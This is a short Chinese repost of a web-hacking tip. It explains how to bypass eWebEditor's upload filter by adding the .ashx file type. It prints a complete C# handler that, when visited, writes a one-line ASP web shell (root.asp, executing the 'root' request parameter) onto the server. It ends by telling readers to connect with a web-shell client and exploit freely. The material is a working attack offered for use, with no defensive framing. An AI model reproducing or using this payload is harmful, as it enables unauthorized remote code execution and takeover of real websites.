刚在逛黑客笔记(
http://hacknote.com/) 的时候看到了一个很不错的上传突破,顺便发过来给大家分享下,该方法是利用在一些比较BT的上传上面,原文内容是写在ewebeditor过滤了 asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型,上传一个ashx脚本上去,脚本内容如下:
<%@ WebHandler Language="C#" class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
然后访问上传后的ashx文件,就会在同目录下生成一个root.asp的一句话木马,然后使用一句话木马客户端连接即可。利用方面就大家自由发挥了!
转载于:https://www.cnblogs.com/mujj/articles/2053480.html